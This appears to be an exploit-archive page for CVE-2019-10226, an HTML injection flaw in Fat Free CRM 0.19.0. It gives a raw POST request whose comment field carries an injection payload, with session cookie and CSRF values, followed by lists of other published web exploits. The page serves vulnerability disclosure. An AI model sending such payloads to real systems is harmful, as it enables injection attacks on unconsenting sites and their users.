Menu

"Fat Free CRM 0.19.0 - HTML Injection"

Author

"Ismail Tasdelen"

Platform

php

Release date

2019-03-28

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
# Exploit Title: Fat Free CRM v0.19.0 - HTML Injection
# Date: 2019-03-20
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: http://www.fatfreecrm.com/
# Source Code : https://github.com/fatfreecrm
# Software :  Fat Free CRM
# Product Version:  v0.19.0
# Vulnerability Type : Code Injection
# Vulnerability : HTML Injection
# CVE : CVE-2019-10226

POST /comments HTTP/1.1
Host: XXXXXXXXXXXX
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: */*;q=0.5, text/javascript, application/javascript, application/ecmascript, application/x-ecmascript
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: XXXXXXXXXXXX
X-CSRF-Token: xikVMkG4Le6llfW44C7CQZsD3Qz7bDgbMCbPFCtMjbzJFTfTF5SOx6xPhFDB6EL8MFNSNspHI51gZqz4V7QNMQ==
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 162
DNT: 1
Connection: close
Cookie: _fat_free_crm_session=b25NTU15QnR0ZGQvOFZiNXptdE81VXNDQUZ1TjYxUi9ucHhPSmxDb2lHS2gzZGhGY0V3Um5pT2NOWVZVZmd0T0pnUjI2UjNGeTJyOEt6ajBpMGRxcHJtT2ZyRnJkL0N3R1VrQlJCMXU1TGg5TkZEaHVubW5nM3duZzROQ0xrekRHWjBNWGpaQjF2TVgyaDR6QXUwS1lGdVEyQk5xN2dqVVVkYlhaV0JTY05DcncrdHNSZWp6dWRWSkQ2V2ZKb1NQRFAwMVhXZFZkQjBFOTJOSUZoQWc5S3J0SnIvS1hNNWVtTGtnd1EwRWJRVS9aWkpUZVhHWUJXQm5EYURLNG1jSEUrRVM5WFZFd05RSjR3ZEViQnViamZvY0RNRXMzZzJyUTZCL2E3YjhEVFVBRmFQOXhyaDd3Vnh5alRSTGlnYjlKUTVPT2laYzNRRjJIWWRLdGthQklrWFZDdFdrbElsWWlRcTBoQm1OZnRpVGRoVmp1ckhIZkxlVUt1c3M0MWQ2d3k1Uk4rd2dnVFAveDlrcHJza2tCd3BQUEduTENMeUxxOUpQN0tKL2RoU29FNHN6YWlrWndDNHcvRHlSUjd5TUFJVVErUm5tVnhLVVhtRE81cnltcnMvaHFuOXdPclR1NGl1OHVnbFZmdi9iaTJTWndjQzdKTThOc0dtMVp1a3VlQk5IQm04QmZuMVl3OHlOSHdJemllcU50UHZCSElGNTVOK0lCY2VSUHBIT20zcFNsay9PN0c1dWVkTHEzVnQxMUUvaXJRNHNoV2ZXNDNWeHpIbDdaUEJvaTBmaG1Xek0zRk5OZDdwTUZjUk4xaUl2N0hCMysvTFNHN2FNOTRhVGY5QU9Jc2VialV5Z1ovQS9ZUW5LUXRzL2lZQjNyTGVlTWY1QnFuczk1L3cvL25tNXlsTDlOcm5XdEpUYlNZNUhSSDNLZEJDRFZNUWVjcHQ1SjJCT3ArOW9nZDMwTGp1UWhqTm1lUE8wcGNHVVhDaG9adnNJdVZmUTVabDNUQ0JGSXEwdjNxK2xsdjF4Uk1TekVVZmoxM3JLajI5dis2VTlGRW4xVHZBNGY4Z3ZVemRZL1VZTy9ET01Ja3lzUkg1MzNQNUtWNUp2bi92QWVMTU1weUJ4NHV6Q0VjTmpvUlo1bVk4dzUzWDAxRWV5cVpBUkRBU1dveDFkQkdQMTJHMTAtLVl6endaUmJ2SStHeHZmZVUya1JKd0E9PQ%3D%3D--5584247e850cfdc0a8c912a9cc5ffaa1ce34b969

utf8=%E2%9C%93&comment%5Bcommentable_id%5D=143&comment%5Bcommentable_type%5D=Contact&comment%5Bcomment%5D=%22%3E%3Ch1%3EIsmail+Tasdelen%3C%2Fh1%3E&commit=Add+Note
Release Date Title Type Platform Author
2019-08-16 "Integria IMS 5.0.86 - Arbitrary File Upload" webapps php Greg.Priest
2019-08-16 "Joomla! component com_jsjobs 1.2.6 - Arbitrary File Deletion" webapps php qw3rTyTy
2019-08-16 "EyesOfNetwork 5.1 - Authenticated Remote Command Execution" webapps php "Nassim Asrir"
2019-08-14 "WordPress Plugin Download Manager 2.5 - Cross-Site Request Forgery" webapps php "Princy Edward"
2019-08-14 "Joomla! Component JS Jobs (com_jsjobs) 1.2.5 - 'customfields.php' SQL Injection" webapps php qw3rTyTy
2019-08-14 "SugarCRM Enterprise 9.0.0 - Cross-Site Scripting" webapps php "Ilca Lucian Florin"
2019-08-12 "Mitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated OS Command Injection Bind Shell" webapps php xerubus
2019-08-12 "Mitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated Configuration Download" webapps php xerubus
2019-08-14 "Agent Tesla Botnet - Arbitrary Code Execution (Metasploit)" remote php "Ege Balci"
2019-08-13 "AZORult Botnet - SQL Injection" remote php prsecurity
2019-08-13 "Agent Tesla Botnet - Arbitrary Code Execution" remote php prsecurity
2019-08-12 "Joomla! Component JS Jobs (com_jsjobs) 1.2.5 - 'cities.php' SQL Injection" webapps php qw3rTyTy
2019-08-12 "osTicket 1.12 - Persistent Cross-Site Scripting" webapps php "Aishwarya Iyer"
2019-08-12 "osTicket 1.12 - Formula Injection" webapps php "Aishwarya Iyer"
2019-08-12 "osTicket 1.12 - Persistent Cross-Site Scripting via File Upload" webapps php "Aishwarya Iyer"
2019-08-12 "Joomla! Component JS Support Ticket (com_jssupportticket) 1.1.6 - 'ticket.php' Arbitrary File Deletion" webapps php qw3rTyTy
2019-08-12 "Joomla! Component JS Support Ticket (com_jssupportticket) 1.1.6 - 'ticketreply.php' SQL Injection" webapps php qw3rTyTy
2019-08-12 "UNA 10.0.0 RC1 - 'polyglot.php' Persistent Cross-Site Scripting" webapps php Greg.Priest
2019-08-12 "BSI Advance Hotel Booking System 2.0 - 'booking_details.php Persistent Cross-Site Scripting" webapps php "Angelo Ruwantha"
2019-08-08 "Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - SQL Injection" webapps php qw3rTyTy
2019-08-08 "Adive Framework 2.0.7 - Cross-Site Request Forgery" webapps php "Pablo Santiago"
2019-08-08 "Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - Arbitrary File Download" webapps php qw3rTyTy
2019-08-08 "Daily Expense Manager 1.0 - Cross-Site Request Forgery (Delete Income)" webapps php "Mr Winst0n"
2019-08-08 "Open-School 3.0 / Community Edition 2.3 - Cross-Site Scripting" webapps php Greg.Priest
2019-08-08 "Baldr Botnet Panel - Arbitrary Code Execution (Metasploit)" remote php "Ege Balci"
2019-08-07 "WordPress Plugin JoomSport 3.3 - SQL Injection" webapps php "Pablo Santiago"
2019-08-02 "1CRM On-Premise Software 8.5.7 - Persistent Cross-Site Scripting" webapps php "Kusol Watchara-Apanukorn"
2019-08-02 "Rest - Cafe and Restaurant Website CMS - 'slug' SQL Injection" webapps php n1x_
2019-08-02 "Sar2HTML 3.2.1 - Remote Command Execution" webapps php "Cemal Cihad ÇİFTÇİ"
2019-08-01 "WebIncorp ERP - SQL injection" webapps php n1x_
Release Date Title Type Platform Author
2019-05-10 "RICOH SP 4520DN Printer - HTML Injection" webapps hardware "Ismail Tasdelen"
2019-05-10 "RICOH SP 4510DN Printer - HTML Injection" webapps hardware "Ismail Tasdelen"
2019-05-10 "dotCMS 5.1.1 - HTML Injection" webapps jsp "Ismail Tasdelen"
2019-03-28 "Fat Free CRM 0.19.0 - HTML Injection" webapps php "Ismail Tasdelen"
2019-03-04 "Craft CMS 3.1.12 Pro - Cross-Site Scripting" webapps php "Ismail Tasdelen"
2019-03-04 "Bolt CMS 3.6.4 - Cross-Site Scripting" webapps php "Ismail Tasdelen"
2018-10-25 "User Management 1.1 - Cross-Site Scripting" webapps php "Ismail Tasdelen"
2018-10-25 "Ekushey Project Manager CRM 3.1 - Cross-Site Scripting" webapps php "Ismail Tasdelen"
2018-10-24 "LANGO Codeigniter Multilingual Script 1.0 - Cross-Site Scripting" webapps php "Ismail Tasdelen"
2018-10-17 "BigTree CMS 4.2.23 - Cross-Site Scripting" webapps php "Ismail Tasdelen"
2018-10-16 "WordPress Plugin Support Board 1.2.3 - Cross-Site Scripting" webapps php "Ismail Tasdelen"
2018-10-16 "Library CMS 2.1.1 - Cross-Site Scripting" webapps php "Ismail Tasdelen"
2018-10-15 "AlchemyCMS 4.1 - Cross-Site Scripting" webapps ruby "Ismail Tasdelen"
2018-10-12 "CAMALEON CMS 2.4 - Cross-Site Scripting" webapps ruby "Ismail Tasdelen"
2018-10-12 "LUYA CMS 1.0.12 - Cross-Site Scripting" webapps php "Ismail Tasdelen"
2018-10-03 "RICOH MP C1803 JPN Printer - Cross-Site Scripting" webapps hardware "Ismail Tasdelen"
2018-10-03 "Airties AIR5342 1.0.0.18 - Cross-Site Scripting" webapps hardware "Ismail Tasdelen"
2018-10-02 "Coaster CMS 5.5.0 - Cross-Site Scripting" webapps php "Ismail Tasdelen"
2018-10-01 "Fork CMS 5.4.0 - Cross-Site Scripting" webapps php "Ismail Tasdelen"
2018-10-01 "ManageEngine AssetExplorer 6.2.0 - Cross-Site Scripting" webapps java "Ismail Tasdelen"
2018-09-27 "ManageEngine Desktop Central 10.0.271 - Cross-Site Scripting" webapps java "Ismail Tasdelen"
2018-09-25 "RICOH MP C406Z Printer - Cross-Site Scripting" webapps hardware "Ismail Tasdelen"
2018-09-25 "RICOH MP 305+ Printer - Cross-Site Scripting" webapps hardware "Ismail Tasdelen"
2018-09-25 "RICOH MP C6503 Plus Printer - Cross-Site Scripting" webapps hardware "Ismail Tasdelen"
2018-09-25 "RICOH MP C2003 Printer - Cross-Site Scripting" webapps hardware "Ismail Tasdelen"
2018-09-24 "RICOH MP C6003 Printer - Cross-Site Scripting" webapps hardware "Ismail Tasdelen"
2018-09-24 "RICOH Aficio MP 301 Printer - Cross-Site Scripting" webapps hardware "Ismail Tasdelen"
2018-08-27 "RICOH MP C4504ex Printer - Cross-Site Request Forgery (Add Admin)" webapps hardware "Ismail Tasdelen"
2018-08-26 "ManageEngine ADManager Plus 6.5.7 - Cross-Site Scripting" webapps windows_x86-64 "Ismail Tasdelen"
2018-08-25 "ManageEngine ADManager Plus 6.5.7 - HTML Injection" webapps windows "Ismail Tasdelen"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46617/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46617/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46617/41068/fat-free-crm-0190-html-injection/download/", "exploit_id": "46617", "exploit_description": "\"Fat Free CRM 0.19.0 - HTML Injection\"", "exploit_date": "2019-03-28", "exploit_author": "\"Ismail Tasdelen\"", "exploit_type": "webapps", "exploit_platform": "php", "exploit_port": null}
                                            

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Browse exploit APIBrowse